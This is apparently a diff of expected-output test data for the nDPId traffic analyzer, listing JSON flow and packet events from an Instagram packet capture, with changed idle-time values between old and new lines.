+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1436720908572,"flow_last_seen":1436720908746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5231,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.174","src_port":44558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"}} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1436720900684,"flow_last_seen":1436720900750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":55562,"flow_avg_l4_payload_len":1068,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38816,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720908521,"flow_last_seen":1436720908542,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.160","src_port":38817,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1436720906022,"flow_last_seen":1436720906022,"flow_idle_time":180000,"flow_min_l4_payload_len":103,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.106","dst_ip":"192.168.0.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1436720898354,"flow_last_seen":1436720899158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":464,"flow_tot_l4_payload_len":1509,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"173.252.107.4","src_port":56382,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1436720908466,"flow_last_seen":1436720910950,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4671,"flow_avg_l4_payload_len":424,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33763,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1436720952553,"flow_last_seen":1436720952593,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":35450,"flow_avg_l4_payload_len":723,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":81,"flow_first_seen":1436720900690,"flow_last_seen":1436720908566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":47902,"flow_avg_l4_payload_len":591,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"}} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1436720906070,"flow_last_seen":1436720908431,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":5252,"flow_avg_l4_payload_len":437,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"31.13.93.52","dst_ip":"192.168.0.103","src_port":443,"dst_port":33934,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1436720908216,"flow_last_seen":1436720908432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":4639,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33935,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":68,"flow_first_seen":1436720898386,"flow_last_seen":1436720908442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":41200,"flow_avg_l4_payload_len":605,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"31.13.93.52","src_port":33936,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1436720908524,"flow_last_seen":1436720908575,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":33603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720906025,"flow_last_seen":1436720906025,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"192.168.0.255","src_port":520,"dst_port":520,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2210,"source":"instagram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1436720942507,"flow_last_seen":1436720942524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":21875,"flow_avg_l4_payload_len":875,"midstream":1,"thread_ts_msec":1568796255020,"l3_proto":"ip4","src_ip":"92.122.48.138","dst_ip":"192.168.0.103","src_port":80,"dst_port":41562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265146,"flow_last_seen":1568796265146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265146,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2216,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1568796265146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265146,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDQAbvb0IW1AAAAALAC\/\/8u4wAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796265147,"flow_last_seen":1568796265147,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796265147,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2217,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1568796265147,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796265147,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDRAbs6ii8aAAAAALAC\/\/8mxAAAAgQFtAEDAwYBAQgKDXCenAAAAAAEAgAA"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2218,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1568796265158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265158,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNDH6s7\/29CFtqASbHAaPQAAAgQFeAQCCApocroGDXCenAEDAwg="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2219,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1568796265159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796265159,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wNGAszpfOoovG6ASbHAHRwAAAgQFeAQCCApsGJ0PDXCenAEDAwg="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2220,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1568796265159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265159,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDQAbvb0IW2x+rPAIAQCAytJAAAAQEICg1wnqpocroG"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2221,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1568796265160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796265160,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDRAbs6ii8bgLM6YIAQCAyaLgAAAQEICg1wnqpsGJ0P"} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2222,"source":"instagram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265146,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49360,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00920{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2224,"source":"instagram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796265147,"flow_last_seen":1568796265162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1568796265162,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49361,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"44dab16d680ef93487bc16ad23b3ffb1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 